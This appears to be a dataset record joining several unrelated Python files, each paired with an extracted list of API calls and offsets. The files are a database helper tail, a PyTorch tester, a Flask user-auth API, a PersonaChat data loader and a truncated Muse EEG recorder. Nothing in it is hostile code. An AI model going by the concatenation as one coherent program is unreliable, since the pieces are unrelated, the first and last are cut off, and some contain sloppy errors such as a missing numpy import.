# class MSSQLDB(DB):
# def __init__(self, **keywords):
# import pymssql as db
# if 'pw' in keywords:
# keywords['password'] = keywords.pop('pw')
# keywords['database'] = keywords.pop('db')
# self.dbname = "mssql"
# DB.__init__(self, db, keywords)
#
# def _process_query(self, sql_query):
# """Takes the SQLQuery object and returns query string and parameters.
# """
# # MSSQLDB expects params to be a tuple.
# # Overwriting the default implementation to convert params to tuple.
# paramstyle = getattr(self, 'paramstyle', 'pyformat')
# query = sql_query.query(paramstyle)
# params = sql_query.values()
# return query, tuple(params)
#
# def sql_clauses(self, what, tables, where, group, order, limit, offset):
# return (
# ('SELECT', what),
# ('TOP', limit),
# ('FROM', sqllist(tables)),
# ('WHERE', where),
# ('GROUP BY', group),
# ('ORDER BY', order),
# ('OFFSET', offset))
#
# def _test(self):
# """Test LIMIT.
#
# Fake presence of pymssql module for running tests.
# >>> import sys
# >>> sys.modules['pymssql'] = sys.modules['sys']
#
# MSSQL has TOP clause instead of LIMIT clause.
# >>> db = MSSQLDB(db='test', user='joe', pw='secret')
# >>> db.select('foo', limit=4, _test=True)
# <sql: 'SELECT * TOP 4 FROM foo'>
# """
# pass
_databases = {}
def sqlclient(dburl=None, **params):
"""Creates appropriate database using params.
Pooling will be enabled if DBUtils module is available.
Pooling can be disabled by passing pooling=False in params.
"""
dbn = params.pop('dbn')
if dbn in _databases:
return _databases[dbn](**params)
else:
raise UnknownDB(dbn)
def register_database(name, clazz):
"""
Register a database.
>>> class LegacyDB(DB):
... def __init__(self, **params):
... pass
...
>>> register_database('legacy', LegacyDB)
>>> db = database(dbn='legacy', db='test', user='joe', passwd='<PASSWORD>')
"""
_databases[name] = clazz
register_database('mysql', MySQLDB)
register_database('sqlite', SqliteDB)
# register_database('postgres', PostgresDB)
# register_database('oracle', OracleDB)
# register_database('mssql', MSSQLDB)
def _interpolate(format1):
"""
Takes a format1 string and returns a list of 2-tuples of the form
(boolean, string) where boolean says whether string should be evaled
or not.
from <http://lfw.org/python/Itpl.py> (public domain, Ka-Ping Yee)
"""
from tokenize import Token
def matchorfail(text, pos):
tokenprog = re.compile(Token)
match = tokenprog.match(text, pos)
if match is None:
raise _ItplError(text, pos)
return match, match.end()
namechars = "abcdefghijklmnopqrstuvwxyz" \
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_";
chunks = []
pos = 0
while 1:
dollar = format1.find("$", pos)
if dollar < 0:
break
nextchar = format1[dollar + 1]
if nextchar == "{":
chunks.append((0, format1[pos:dollar]))
pos, level = dollar + 2, 1
while level:
match, pos = matchorfail(format1, pos)
tstart, tend = match.regs[3]
token = format1[tstart:tend]
if token == "{":
level = level + 1
elif token == "}":
level = level - 1
chunks.append((1, format1[dollar + 2:pos - 1]))
elif nextchar in namechars:
chunks.append((0, format1[pos:dollar]))
match, pos = matchorfail(format1, dollar + 1)
while pos < len(format1):
if format1[pos] == "." and \
pos + 1 < len(format1) and format1[pos + 1] in namechars:
match, pos = matchorfail(format1, pos + 1)
elif format1[pos] in "([":
pos, level = pos + 1, 1
while level:
match, pos = matchorfail(format1, pos)
tstart, tend = match.regs[3]
token = format1[tstart:tend]
if token[0] in "([":
level = level + 1
elif token[0] in ")]":
level = level - 1
else:
break
chunks.append((1, format1[dollar + 1:pos]))
else:
chunks.append((0, format1[pos:dollar + 1]))
pos = dollar + 1 + (nextchar == "$")
if pos < len(format1):
chunks.append((0, format1[pos:]))
return chunks
if __name__ == "__main__":
import doctest
doctest.testmod()
| [
"ssguan.ignitor.base.struct.ThreadedDict",
"re.compile",
"ssguan.ignitor.base.struct.Storage",
"DBUtils.PooledDB.PooledDB",
"doctest.testmod",
"time.time",
"DBUtils.PooledDB.__version__.split"
] | [((1113, 1122), 'ssguan.ignitor.base.struct.Storage', 'Storage', ([], {}), '()\n', (1120, 1122), False, 'from ssguan.ignitor.base.struct import ThreadedDict, Storage\n'), ((41310, 41327), 'doctest.testmod', 'doctest.testmod', ([], {}), '()\n', (41325, 41327), False, 'import doctest\n'), ((14751, 14765), 'ssguan.ignitor.base.struct.ThreadedDict', 'ThreadedDict', ([], {}), '()\n', (14763, 14765), False, 'from ssguan.ignitor.base.struct import ThreadedDict, Storage\n'), ((39121, 39138), 're.compile', 're.compile', (['Token'], {}), '(Token)\n', (39131, 39138), False, 'import re\n'), ((17956, 17967), 'time.time', 'time.time', ([], {}), '()\n', (17965, 17967), False, 'import time\n'), ((18091, 18102), 'time.time', 'time.time', ([], {}), '()\n', (18100, 18102), False, 'import time\n'), ((16929, 16960), 'DBUtils.PooledDB.__version__.split', 'PooledDB.__version__.split', (['"""."""'], {}), "('.')\n", (16955, 16960), False, 'from DBUtils import PooledDB\n'), ((17007, 17058), 'DBUtils.PooledDB.PooledDB', 'PooledDB.PooledDB', ([], {'dbapi': 'self.db_module'}), '(dbapi=self.db_module, **keywords)\n', (17024, 17058), False, 'from DBUtils import PooledDB\n'), ((17102, 17155), 'DBUtils.PooledDB.PooledDB', 'PooledDB.PooledDB', ([], {'creator': 'self.db_module'}), '(creator=self.db_module, **keywords)\n', (17119, 17155), False, 'from DBUtils import PooledDB\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2019, Linear Labs Technologies
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import torch
import tqdm
import math
import torch.nn as nn
from torch.utils.data import DataLoader
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import torchvision.models as models
import yajl as json
from tensorboardX import SummaryWriter
import random
from PIL import Image
import torch
import torch.nn as nn
import torchvision.models as models
from torch.nn.utils.rnn import pack_padded_sequence
from ..Common.utils import *
from ..Common.Compiler import Compile,cfg2nets
from ..DataSet.TestSet import TestSet
from BLOX.Modules.ReplayMemory import ReplayMemory
from collections import namedtuple
from itertools import count
from ignite.engine import Events, create_supervised_trainer, create_supervised_evaluator
Transition = namedtuple('Transition',
('state', 'action', 'next_state', 'reward'))
device = 'cuda' if torch.cuda.is_available() else 'cpu'
from BLOX.Common.Strings import TITLE as TEXT
from BLOX.Core.Recordable import METRICS,ADDITIONAL_METRICS,Vizzy
class Tester:
def __init__(self,args):
try: self.config = json.load(open(args.config,'r'))
except:
if isinstance(args,dict): self.config = args
elif isinstance(args,str): self.config = json.load(open(args,'r'))
else:raise ValueError('Incorrect data type passed to Trainer class')
if self.config['Verbose']:print(TEXT+('\n'*8))
def run(self):
config = self.config
torch.cuda.empty_cache()
model = cfg2nets(config)
# data = DataLoader(TestSet(config['DataSet']), batch_size=config['BatchSize'] if 'BatchSize' in config else 1,shuffle=True )
data = TestSet(config['DataSet'])
writer = SummaryWriter(config['TensorboardX']['Dir'] if 'Dir' in config['TensorboardX'] else 'runs')
tlosses = np.zeros(config['Epochs'])
dlosses = np.zeros(config['Epochs'])
evaluator = create_supervised_evaluator(model,
device=device)
for m in config['TensorboardX']['Log']:
if m not in METRICS or m == 'Loss':continue
mtrc = METRICS[m]()
mtrc.attach(evaluator,m)
pbar = tqdm.tqdm(
initial=0, leave=False, total=len(data),
)
add_metrics = {}
@evaluator.on(Events.ITERATION_COMPLETED)
def log_training_loss(engine):
i = engine.state.iteration
if (i%(config['TensorboardX']['LogEvery']))==0 and config['TensorboardX']['LogEvery'] > 0 and writer:
for m in engine.state.metrics.keys():
if m in METRICS:writer.add_scalar(m, engine.state.metrics[m], engine.state.iteration)
try:
for m in config['TensorboardX']['Log']:
if m in ADDITIONAL_METRICS:
if m not in add_metrics:
add_metrics[m] = {
'y_h':[],
'y':[]
}
add_metrics[m]['y'].append( engine.state.output[1].view(-1).numpy() )
add_metrics[m]['y_h'].append( engine.state.output[0].view(-1).data.numpy() )
except:pass
pbar.update(config['TensorboardX']['LogEvery'])
try:
evaluator.run(data, max_epochs=1)
except:pass
pbar.close()
try:
for m in config['TensorboardX']['Log']:
if m in ADDITIONAL_METRICS:
getattr(Vizzy,m)(Vizzy,ADDITIONAL_METRICS[m]( add_metrics[m]['y_h'],add_metrics[m]['y'] ))
except Exception as e:pass
| [
"ignite.engine.create_supervised_evaluator",
"collections.namedtuple",
"tensorboardX.SummaryWriter",
"torch.cuda.is_available",
"torch.cuda.empty_cache"
] | [((1420, 1489), 'collections.namedtuple', 'namedtuple', (['"""Transition"""', "('state', 'action', 'next_state', 'reward')"], {}), "('Transition', ('state', 'action', 'next_state', 'reward'))\n", (1430, 1489), False, 'from collections import namedtuple\n'), ((1534, 1559), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1557, 1559), False, 'import torch\n'), ((2136, 2160), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (2158, 2160), False, 'import torch\n'), ((2389, 2485), 'tensorboardX.SummaryWriter', 'SummaryWriter', (["(config['TensorboardX']['Dir'] if 'Dir' in config['TensorboardX'] else 'runs')"], {}), "(config['TensorboardX']['Dir'] if 'Dir' in config[\n 'TensorboardX'] else 'runs')\n", (2402, 2485), False, 'from tensorboardX import SummaryWriter\n'), ((2592, 2641), 'ignite.engine.create_supervised_evaluator', 'create_supervised_evaluator', (['model'], {'device': 'device'}), '(model, device=device)\n', (2619, 2641), False, 'from ignite.engine import Events, create_supervised_trainer, create_supervised_evaluator\n')] |
#! python
from commonthread import *
import time
lg = ThreadLogger()
lg.debug('hello!')
def worker1(th, x, y, **kwargs):
lg.debug('start')
lg.debug('th.name={}'.format(th.name))
lg.debug('x={}'.format(x))
lg.debug('y={}'.format(y))
lg.debug('kwargs={}'.format(kwargs))
time.sleep(5)
lg.debug('end')
t1 = WorkerThread(worker1, 'XXX', 'YYY', kw1='KeyWord-1')
t1.start()
t1.join()
| [
"time.sleep"
] | [((308, 321), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (318, 321), False, 'import time\n')] |
from uuid import uuid4
from datetime import datetime, timedelta
from flask import request, make_response, jsonify, Blueprint
from flask_restful import Resource, Api
from marshmallow.exceptions import ValidationError as DataError
from flask_jwt_extended import create_access_token, get_jwt_identity, jwt_required, current_user
from pluggy import HookimplMarker
from sqlalchemy import func
from app.core.helpers import handleInternalError
from app.extentions import db
from .models import UserModel
from .schemas import UserSchema, UserInviteSchema, AcceptInviteSchema, UserFullProfileSchema
from .validators import validate_email
from .exceptions import ValidationError, AuthenticationError
impl = HookimplMarker('app')
user_schema = UserSchema()
user_full_profile = UserFullProfileSchema()
users_schema = UserSchema(many=True)
user_invite_schema = UserInviteSchema()
accept_invite_schema = AcceptInviteSchema()
class User(Resource):
@jwt_required
def get(self, user_id=None):
try:
if user_id:
user = UserModel.get_user_by_ids([user_id])
if (len(user) > 0):
return user_schema.dump(user[0]), 200
else:
return {"error": "Cannot find the user"}, 422
else:
return user_full_profile.dump(current_user), 200
except Exception as e:
return handleInternalError(e)
def post(self):
print(request.form)
return {'hello': 'world'}
class UserInvite(Resource):
@jwt_required
def post(self):
try:
if current_user.account_id is None:
return {"error": "Cannot find an associated account"}, 422
user_data = request.get_json()
user = user_invite_schema.load(user_data)
validate_email(user.email)
user.account_id = current_user.account_id
user.set_password_token = str(uuid4())
user.set_password_token_expiry = datetime.now() + timedelta(2)
user.save()
return user_invite_schema.dump(user), 200
except DataError as data_error:
return {"error": data_error.normalized_messages()}, 422
except ValidationError as data_error:
return {"error": data_error.error_message}, 422
except Exception as e:
return handleInternalError(e)
def put(self):
try:
request_data = request.get_json()
accept_invite_data = accept_invite_schema.load(request_data)
user = self.fetch_user_from_token(accept_invite_data['token'])
user.set_password_token = None
user.set_password_token_expiry = None
user.password = accept_invite_data['password']
user.activated_at = datetime.now()
user.save()
return user_schema.dump(user), 200
except ValidationError as data_error:
return {"error": data_error.error_message}, 422
except DataError as data_error:
return {"error": data_error.normalized_messages()}, 422
except Exception as e:
return handleInternalError(e)
def fetch_user_from_token(self, token):
user = UserModel.get_user_by_token(token)
cur_date_time = datetime.now()
if user is None or user.set_password_token_expiry < cur_date_time:
raise ValidationError("Token is invalid or expired")
return user
class UserLogin(Resource):
def post(self):
try:
credentials = request.get_json()
user = UserModel.query.filter(func.lower(
UserModel.email) == credentials['email']).first()
if user is None:
raise AuthenticationError(
"No account is assciated with the given email.")
if not user.check_password(credentials['password']):
raise AuthenticationError(
"Invalid email, password combination")
access_token = create_access_token(user)
return {'token': access_token}, 200
except AuthenticationError as auth_error:
return {'error': auth_error.error_message}, 401
class UserRegistration(Resource):
def post(self):
try:
user_data = request.get_json()
user = user_schema.load(user_data)
validate_email(user.email)
user.save()
return user_schema.dump(user), 200
except DataError as data_error:
return {'error': data_error.normalized_messages()}, 422
except ValidationError as data_error:
return {'error': data_error.error_message}, 422
except Exception as e:
return handleInternalError(e)
@impl
def app_load_blueprints(app):
userBp = Blueprint("user", __name__, url_prefix="/user")
userApi = Api(app=userBp)
userApi.add_resource(UserRegistration, "/register")
userApi.add_resource(UserLogin, "/login")
userApi.add_resource(User, "/", "/<user_id>")
userApi.add_resource(UserInvite, "/invite")
app.register_blueprint(userBp)
| [
"flask_restful.Api",
"pluggy.HookimplMarker",
"flask_jwt_extended.create_access_token",
"uuid.uuid4",
"app.core.helpers.handleInternalError",
"datetime.datetime.now",
"flask.request.get_json",
"datetime.timedelta",
"flask.Blueprint",
"sqlalchemy.func.lower"
] | [((698, 719), 'pluggy.HookimplMarker', 'HookimplMarker', (['"""app"""'], {}), "('app')\n", (712, 719), False, 'from pluggy import HookimplMarker\n'), ((4822, 4869), 'flask.Blueprint', 'Blueprint', (['"""user"""', '__name__'], {'url_prefix': '"""/user"""'}), "('user', __name__, url_prefix='/user')\n", (4831, 4869), False, 'from flask import request, make_response, jsonify, Blueprint\n'), ((4884, 4899), 'flask_restful.Api', 'Api', ([], {'app': 'userBp'}), '(app=userBp)\n', (4887, 4899), False, 'from flask_restful import Resource, Api\n'), ((3294, 3308), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3306, 3308), False, 'from datetime import datetime, timedelta\n'), ((1734, 1752), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (1750, 1752), False, 'from flask import request, make_response, jsonify, Blueprint\n'), ((2451, 2469), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (2467, 2469), False, 'from flask import request, make_response, jsonify, Blueprint\n'), ((2802, 2816), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (2814, 2816), False, 'from datetime import datetime, timedelta\n'), ((3557, 3575), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (3573, 3575), False, 'from flask import request, make_response, jsonify, Blueprint\n'), ((4031, 4056), 'flask_jwt_extended.create_access_token', 'create_access_token', (['user'], {}), '(user)\n', (4050, 4056), False, 'from flask_jwt_extended import create_access_token, get_jwt_identity, jwt_required, current_user\n'), ((4308, 4326), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (4324, 4326), False, 'from flask import request, make_response, jsonify, Blueprint\n'), ((1399, 1421), 'app.core.helpers.handleInternalError', 'handleInternalError', (['e'], {}), '(e)\n', (1418, 1421), False, 'from app.core.helpers import handleInternalError\n'), ((1942, 1949), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (1947, 1949), False, 'from uuid import uuid4\n'), ((1996, 2010), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (2008, 2010), False, 'from datetime import datetime, timedelta\n'), ((2013, 2025), 'datetime.timedelta', 'timedelta', (['(2)'], {}), '(2)\n', (2022, 2025), False, 'from datetime import datetime, timedelta\n'), ((2368, 2390), 'app.core.helpers.handleInternalError', 'handleInternalError', (['e'], {}), '(e)\n', (2387, 2390), False, 'from app.core.helpers import handleInternalError\n'), ((3152, 3174), 'app.core.helpers.handleInternalError', 'handleInternalError', (['e'], {}), '(e)\n', (3171, 3174), False, 'from app.core.helpers import handleInternalError\n'), ((4748, 4770), 'app.core.helpers.handleInternalError', 'handleInternalError', (['e'], {}), '(e)\n', (4767, 4770), False, 'from app.core.helpers import handleInternalError\n'), ((3618, 3645), 'sqlalchemy.func.lower', 'func.lower', (['UserModel.email'], {}), '(UserModel.email)\n', (3628, 3645), False, 'from sqlalchemy import func\n')] |
# -*- coding: utf-8 -*-
r"""
DataModule
==========
The DataModule encapsulates all the steps needed to process data:
- Download / tokenize
- Save to disk.
- Apply transforms (tokenize, pad, batch creation, etc…).
- Load inside Dataset.
- Wrap inside a DataLoader.
The most important function to understand inside the DataModule is the `build_input` which
is responsible by building the inputs that will be used to train the PersonaGPT2 Model.
This function receives a tokenized `persona`, `history` and `reply`, concatenates everything
and builds the language model targets. It also keeps track of the possition of the token used
to represent the entire sequence (the last one).
Example:
>>> tokenizer = GPT2Tokenizer.from_pretrained("gpt2")
>>> DataModule.build_input(
tokenizer=tokenizer,
persona=[[72, 588], [1820, 318]],
history=[[5303, 1804], [316, 20023]],
reply=[276, 764],
lm_labels=False
)
{'input_ids': [50258, 72, 588, 1820, 318, 50260, 5303, 1804, 50261, 316, 20023, 50260,
276, 764, 50258], 'token_type_ids': [50260, 50260, 50260, 50260, 50260, 50261, 50261,
50261, 50260, 50260, 50260, 50261, 50261, 50261, 50261], 'mc_token_ids': 14, 'lm_labels':
[-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100]}
>>> DataModule.build_input(
tokenizer=tokenizer,
persona=[[72, 588], [1820, 318]],
history=[[5303, 1804], [316, 20023]],
reply=[276, 764],
lm_labels=True
)
{'input_ids': [50258, 72, 588, 1820, 318, 50260, 5303, 1804, 50261, 316, 20023, 50260,
276, 764, 50258], 'token_type_ids': [50260, 50260, 50260, 50260, 50260, 50261, 50261,
50261, 50260, 50260, 50260, 50261, 50261, 50261, 50261], 'mc_token_ids': 14, 'lm_labels':
[-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, 276, 764, 50258]}
"""
import hashlib
import json
import multiprocessing
import os
from argparse import Namespace
from collections import defaultdict
from itertools import chain
from typing import Dict, List
import click
import torch
from torch.utils.data import DataLoader, TensorDataset
import pytorch_lightning as pl
from model.tokenizer import Tokenizer
from torchnlp.download import download_file_maybe_extract
PERSONACHAT_URL = "https://s3.amazonaws.com/datasets.huggingface.co/personachat/personachat_self_original.json"
PADDED_INPUTS = ["input_ids", "lm_labels", "token_type_ids"]
MODEL_INPUTS = ["input_ids", "mc_token_ids", "lm_labels", "mc_labels", "token_type_ids"]
class DataModule(pl.LightningDataModule):
"""PyTorch Lightning DataModule.
:param hparams: Namespace with data specific arguments.
:param tokenizer: Model Tokenizer.
"""
def __init__(self, hparams: Namespace, tokenizer: Tokenizer):
super().__init__()
self.hparams = hparams
self.tokenizer = tokenizer
@classmethod
def build_input(
cls,
tokenizer: Tokenizer,
persona: List[List[int]],
history: List[List[int]],
reply: List[int] = [],
lm_labels: bool = False,
) -> Dict[str, List[int]]:
"""Builds a model input.
:param persona: List of persona sentences tokenized.
:param history: List of history sentences tokenizes.
:param reply: Tokenized answer.
:param lm_labels: Flag to build LM labels for ground-truth replies.
:return: Dictionary with model inputs.
"""
bos, eos, speaker1, speaker2 = (
tokenizer.bos_index,
tokenizer.eos_index,
tokenizer.speaker1_index,
tokenizer.speaker2_index,
)
sequence = (
[[bos] + list(chain(*persona))] # concats all persona sentences
+ history # concats history
+ [reply + [eos]] # concats reply
)
sequence = [sequence[0]] + [
[speaker2 if (len(sequence) - i) % 2 else speaker1] + s
for i, s in enumerate(sequence[1:])
]
instance = {
"input_ids": list(chain(*sequence)),
"token_type_ids": [
speaker2 if i % 2 else speaker1
for i, s in enumerate(sequence)
for _ in s
],
}
instance["mc_token_ids"] = len(instance["input_ids"]) - 1
instance["lm_labels"] = [-100] * len(instance["input_ids"])
if lm_labels:
instance["lm_labels"] = (
([-100] * sum(len(s) for s in sequence[:-1]))
+ [-100]
+ sequence[-1][1:]
)
return instance
def _tokenize(self, obj):
if isinstance(obj, str):
return self.tokenizer.encode(obj)
if isinstance(obj, dict):
return dict((k, self._tokenize(o)) for k, o in obj.items())
return list(self._tokenize(o) for o in obj)
def _get_dataset(
self,
dataset_path: str = "",
data_folder: str = "data/",
):
"""Downloads PersonaChat corpus from S3 if no dataset_path is provided.
:param dataset_path: Path to a json file containing the train and validation dataset.
:param data_folder: Folder used to store data.
:return: Returns a dictionary with the training and validation data.
"""
if not os.path.isfile(dataset_path):
click.secho(f"Download dataset from {PERSONACHAT_URL}", fg="yellow")
dataset_file = download_file_maybe_extract(
PERSONACHAT_URL,
directory=data_folder,
check_files=["personachat_self_original.json"],
)
dataset_path = "data/personachat_self_original.json"
dataset_hash = (
int(hashlib.sha256(dataset_path.encode("utf-8")).hexdigest(), 16) % 10 ** 8
)
# To avoid using cache for different models
# split(/) for microsoft/DialoGPT-small
pretrained_model = (
self.hparams.pretrained_model.split("/")[1]
if "/" in self.hparams.pretrained_model
else self.hparams.pretrained_model
)
dataset_cache = data_folder + ".dataset_" + str(dataset_hash) + pretrained_model
if os.path.isfile(dataset_cache):
click.secho(f"Loading tokenized dataset from cache: {dataset_cache}.")
return torch.load(dataset_cache)
else:
dataset_file = dataset_path
with open(dataset_file, "r", encoding="utf-8") as f:
dataset = json.loads(f.read())
click.secho("Running tokenization: This might take some time!", fg="yellow")
dataset = self._tokenize(dataset)
torch.save(dataset, dataset_cache)
return dataset
@classmethod
def pad_dataset(
cls, dataset: dict, padding: int = 0, padded_inputs: List[str] = PADDED_INPUTS
):
"""
Pad the dataset.
NOTE: This could be optimized by defining a Dataset class and
padding at the batch level, but this is simpler.
:param dataset: Dictionary with sequences to pad.
:param padding: padding index.
:param padded_inputs:
"""
max_l = max(len(x) for x in dataset["input_ids"])
for name in padded_inputs:
dataset[name] = [
x + [padding if name != "lm_labels" else -100] * (max_l - len(x))
for x in dataset[name]
]
return dataset
def prepare_data(self):
"""
Lightning DataModule function that will be used to load/download data,
build inputs with padding and to store everything as TensorDatasets.
"""
personachat = self._get_dataset(self.hparams.dataset_path)
click.secho("Building inputs and labels.", fg="yellow")
datasets = {"train": defaultdict(list), "valid": defaultdict(list)}
for dataset_name, dataset in personachat.items():
num_candidates = len(dataset[0]["utterances"][0]["candidates"])
if self.hparams.num_candidates > 0 and dataset_name == "train":
num_candidates = min(self.hparams.num_candidates, num_candidates)
for dialog in dataset:
persona = dialog["personality"].copy()
for _ in range(self.hparams.personality_permutations):
for utterance in dialog["utterances"]:
history = utterance["history"][
-(2 * self.hparams.max_history + 1) :
]
for j, candidate in enumerate(
utterance["candidates"][-num_candidates:]
):
lm_labels = bool(j == num_candidates - 1)
instance = self.build_input(
self.tokenizer, persona, history, candidate, lm_labels
)
for input_name, input_array in instance.items():
datasets[dataset_name][input_name].append(input_array)
datasets[dataset_name]["mc_labels"].append(num_candidates - 1)
datasets[dataset_name]["n_candidates"] = num_candidates
persona = [persona[-1]] + persona[:-1] # permuted personalities
click.secho("Padding inputs and building tensors.", fg="yellow")
tensor_datasets = {"train": [], "valid": []}
for dataset_name, dataset in datasets.items():
dataset = self.pad_dataset(dataset, padding=self.tokenizer.pad_index)
for input_name in MODEL_INPUTS:
tensor = torch.tensor(dataset[input_name])
# MC labels contain the labels within the batch!
# Thats why we have to split the data according to those batches.
if input_name != "mc_labels":
tensor = tensor.view(
(-1, datasets[dataset_name]["n_candidates"]) + tensor.shape[1:]
)
tensor_datasets[dataset_name].append(tensor)
self.train_dataset = TensorDataset(*tensor_datasets["train"])
self.valid_dataset = TensorDataset(*tensor_datasets["valid"])
click.secho(
"Train dataset (Batch, Candidates, Seq length): {}".format(
self.train_dataset.tensors[0].shape
),
fg="yellow",
)
click.secho(
"Valid dataset (Batch, Candidates, Seq length): {}".format(
self.valid_dataset.tensors[0].shape
),
fg="yellow",
)
def train_dataloader(self) -> DataLoader:
""" Function that loads the train set. """
return DataLoader(
self.train_dataset,
batch_size=self.hparams.batch_size,
shuffle=True,
num_workers=multiprocessing.cpu_count(),
)
def val_dataloader(self) -> DataLoader:
""" Function that loads the validation set. """
return DataLoader(
self.valid_dataset,
batch_size=self.hparams.batch_size,
shuffle=False,
num_workers=multiprocessing.cpu_count(),
)
| [
"itertools.chain",
"click.secho",
"torch.load",
"torch.utils.data.TensorDataset",
"multiprocessing.cpu_count",
"os.path.isfile",
"torch.tensor",
"torchnlp.download.download_file_maybe_extract",
"collections.defaultdict",
"torch.save"
] | [((6207, 6236), 'os.path.isfile', 'os.path.isfile', (['dataset_cache'], {}), '(dataset_cache)\n', (6221, 6236), False, 'import os\n'), ((6534, 6610), 'click.secho', 'click.secho', (['"""Running tokenization: This might take some time!"""'], {'fg': '"""yellow"""'}), "('Running tokenization: This might take some time!', fg='yellow')\n", (6545, 6610), False, 'import click\n'), ((6661, 6695), 'torch.save', 'torch.save', (['dataset', 'dataset_cache'], {}), '(dataset, dataset_cache)\n', (6671, 6695), False, 'import torch\n'), ((7723, 7778), 'click.secho', 'click.secho', (['"""Building inputs and labels."""'], {'fg': '"""yellow"""'}), "('Building inputs and labels.', fg='yellow')\n", (7734, 7778), False, 'import click\n'), ((9343, 9407), 'click.secho', 'click.secho', (['"""Padding inputs and building tensors."""'], {'fg': '"""yellow"""'}), "('Padding inputs and building tensors.', fg='yellow')\n", (9354, 9407), False, 'import click\n'), ((10140, 10180), 'torch.utils.data.TensorDataset', 'TensorDataset', (["*tensor_datasets['train']"], {}), "(*tensor_datasets['train'])\n", (10153, 10180), False, 'from torch.utils.data import DataLoader, TensorDataset\n'), ((10210, 10250), 'torch.utils.data.TensorDataset', 'TensorDataset', (["*tensor_datasets['valid']"], {}), "(*tensor_datasets['valid'])\n", (10223, 10250), False, 'from torch.utils.data import DataLoader, TensorDataset\n'), ((5306, 5334), 'os.path.isfile', 'os.path.isfile', (['dataset_path'], {}), '(dataset_path)\n', (5320, 5334), False, 'import os\n'), ((5348, 5416), 'click.secho', 'click.secho', (['f"""Download dataset from {PERSONACHAT_URL}"""'], {'fg': '"""yellow"""'}), "(f'Download dataset from {PERSONACHAT_URL}', fg='yellow')\n", (5359, 5416), False, 'import click\n'), ((5444, 5563), 'torchnlp.download.download_file_maybe_extract', 'download_file_maybe_extract', (['PERSONACHAT_URL'], {'directory': 'data_folder', 'check_files': "['personachat_self_original.json']"}), "(PERSONACHAT_URL, directory=data_folder,\n check_files=['personachat_self_original.json'])\n", (5471, 5563), False, 'from torchnlp.download import download_file_maybe_extract\n'), ((6250, 6320), 'click.secho', 'click.secho', (['f"""Loading tokenized dataset from cache: {dataset_cache}."""'], {}), "(f'Loading tokenized dataset from cache: {dataset_cache}.')\n", (6261, 6320), False, 'import click\n'), ((6340, 6365), 'torch.load', 'torch.load', (['dataset_cache'], {}), '(dataset_cache)\n', (6350, 6365), False, 'import torch\n'), ((7808, 7825), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (7819, 7825), False, 'from collections import defaultdict\n'), ((7836, 7853), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (7847, 7853), False, 'from collections import defaultdict\n'), ((4035, 4051), 'itertools.chain', 'chain', (['*sequence'], {}), '(*sequence)\n', (4040, 4051), False, 'from itertools import chain\n'), ((9668, 9701), 'torch.tensor', 'torch.tensor', (['dataset[input_name]'], {}), '(dataset[input_name])\n', (9680, 9701), False, 'import torch\n'), ((10896, 10923), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (10921, 10923), False, 'import multiprocessing\n'), ((11194, 11221), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (11219, 11221), False, 'import multiprocessing\n'), ((3671, 3686), 'itertools.chain', 'chain', (['*persona'], {}), '(*persona)\n', (3676, 3686), False, 'from itertools import chain\n')] |
#!/usr/bin/env python
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '2'
import sys
import csv
import numpy as np
import pandas as pd
import random
from time import time, strftime, gmtime, sleep
from optparse import OptionParser
from pylsl import StreamInlet, resolve_byprop
from sklearn.linear_model import LinearRegression
import subprocess
currentpath = os.path.dirname(os.path.realpath(sys.argv[0]))
# dejitter timestamps
dejitter = False
# how long to wait for the Muse device to connect
muse_connect_timout = 5
parser = OptionParser()
parser.add_option("-d", "--duration",
dest="duration", type='int', default=10,
help="duration of the recording in seconds.")
parser.add_option("-p", "--path",
dest="path", type='str',
help="Directory for the recording file.")
parser.add_option("-s", "--sample",
dest="sample", type='str',
help="Record sample for specific term (1/2/3)")
(options, args) = parser.parse_args()
record_sample = False
record_sample_term = None
if options.sample:
record_sample = True
print("NOTICE: Creating sample dataset for term: " + str(options.sample))
record_sample_term = options.sample
else:
print("NOTICE: Creating training dataset with random terms")
if not options.path:
print("ERROR: please use -p to specify the datapath to the recorded csv files!")
sys.exit(1)
fname = (options.path + "/data_%s.csv" % strftime("%Y-%m-%d-%H.%M.%S", gmtime()))
# search for the last word id in eventually already existing datafiles
last_data_file = None
for file in sorted(os.listdir(options.path)):
if file.endswith(".csv"):
if not "eeg_data" in file:
print(os.path.join(options.path, file))
last_data_file = os.path.join(options.path, file)
if last_data_file:
print("Found existing datafiles! Getting currentWord from last datafiles: " + last_data_file)
line = subprocess.check_output(['tail', '-1', last_data_file])
line = str(line)
linesplit = line.split(",")
#print(linesplit[1])
print("Starting currentWord from " + str(linesplit[1]))
currentWord = int(linesplit[1])
currentWord = currentWord + 1
else:
print("Did not found any existing datafiles! Starting currentWord from 1")
currentWord = 1
print("-- currentWord: " + str(currentWord))
eeg_stream = False
print("looking for an EEG stream...")
streams = resolve_byprop('type', 'EEG', timeout=2)
if len(streams) == 0:
